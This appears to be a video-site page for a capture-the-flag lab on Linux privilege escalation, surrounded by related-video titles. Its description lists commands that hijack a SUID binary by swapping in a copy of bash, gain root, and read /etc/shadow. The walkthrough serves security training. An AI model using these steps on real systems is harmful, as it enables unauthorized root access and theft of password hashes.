Project 93: Linux privilege escalation - Exploiting SUID Binaries (Capture The Flag Edition)

Автор: Daryl Shows His Work

Загружено: 2025-12-03

Просмотров: 8

Описание:

Commands Used (the order as they appear in the video):

1. ifconfig

2. fping -a -g 192.231.149.0/24

2. Open web browser and go to http://192.231.149.3:8000 (to access student machine)

3. whoami

4. groups student

5. pwd

6. cat /etc/passwd

7. ls -al (to view to binaries, "greetings" & "welcome", "s" in welcome's permissions is SUID permission)

8. ./greetings (to execute greeting binary, should fail due to lack of permissions)

9. ./welcome (to execute welcome binary, should succeed due to having necessary permissions)

10. strings welcome (to search for strings in welcome binary, we notice that welcome actually calls the greetings binary when executed. What if we were to modify the greetings binary?)

11. rm greetings (to delete current greetings binary)

12. cp /bin/bash greetings (to create a new greetings binary by copying bash into new file)

13. ls (to verify new greeting binary is in directory)

14. ./welcome (welcome will now execute greetings with root privileges)

15. id (to verify root privileges)

16. cat /etc/shadow (to use root privileges to view shadow password file)

17. cd /

18. ls

19. cd /root

20. ls

21. cat flag

Project 93: Linux privilege escalation - Exploiting SUID Binaries (Capture The Flag Edition)

Доступные форматы для скачивания:

Скачать видео mp4

Информация по загрузке:

Скачать аудио mp3

Похожие видео

Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!

Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!

Project 102 - What Is A Rejetto HTTP File Server and Why Is It A Popular Attack Vector? *CTF edition

Project 102 - What Is A Rejetto HTTP File Server and Why Is It A Popular Attack Vector? *CTF edition

AI-Контент завод на n8n. Автоматическая генерация и публикация в соц. сети. Blotato + kie.ai.

AI-Контент завод на n8n. Автоматическая генерация и публикация в соц. сети. Blotato + kie.ai.

Project 96 - Enumerating SNMP To Compromise Other Protocols 🔍

Project 96 - Enumerating SNMP To Compromise Other Protocols 🔍

Извлечение прошивки китайской IP-камеры — основы пентестинга в Интернете вещей

Извлечение прошивки китайской IP-камеры — основы пентестинга в Интернете вещей

ESP32: распознавание речи нейросетью (TensorFlow Lite)

ESP32: распознавание речи нейросетью (TensorFlow Lite)

Project 92 - Elevating User Privileges Through Misconfigured Cron Jobs (Capture The Flag Edition)

Project 92 - Elevating User Privileges Through Misconfigured Cron Jobs (Capture The Flag Edition)

VMware Pro БЕСПЛАТНО. Установите Kali Linux на Windows 11 ПРЯМО СЕЙЧАС

VMware Pro БЕСПЛАТНО. Установите Kali Linux на Windows 11 ПРЯМО СЕЙЧАС

Project 103 - Exploiting A Vulnerable Apache Tomcat Web Server (Capture The Flag Edition)

Project 103 - Exploiting A Vulnerable Apache Tomcat Web Server (Capture The Flag Edition)

Крах Jaguar: Как “повестка” в рекламе добила легенду британского автопрома

Крах Jaguar: Как “повестка” в рекламе добила легенду британского автопрома

Что я думаю про будущее разработки в эпоху ИИ

Что я думаю про будущее разработки в эпоху ИИ

«Вот теперь я задумался об эмиграции»: зачем Кремль заблокировал Roblox и как реагируют россияне

«Вот теперь я задумался об эмиграции»: зачем Кремль заблокировал Roblox и как реагируют россияне

Экспертиза Android: использование ADB для раскрытия секретов вашего телефона!

Экспертиза Android: использование ADB для раскрытия секретов вашего телефона!

Я Построил Рогатку Более Мощную, чем Пистолет

Я Построил Рогатку Более Мощную, чем Пистолет

ТОП 10 ЛУЧШИХ способов мониторинга Linux

ТОП 10 ЛУЧШИХ способов мониторинга Linux

OSINT для новичков: найдите всё о юзернейме и фото с Sherlock и Google Dorks!

OSINT для новичков: найдите всё о юзернейме и фото с Sherlock и Google Dorks!

NGINX | КАК ПЕТ-ПРОЕКТ ЗАХВАТИЛ МИР

NGINX | КАК ПЕТ-ПРОЕКТ ЗАХВАТИЛ МИР

Что такое "Reverse Engineering". Показываю как ломают софт.

Лучший способ установки Windows 11 на любой ПК быстро и без проблем на любой ПК

Лучший способ установки Windows 11 на любой ПК быстро и без проблем на любой ПК

Отзыв Microsoft: абсолютный КОШМАР конфиденциальности 2025 года

Отзыв Microsoft: абсолютный КОШМАР конфиденциальности 2025 года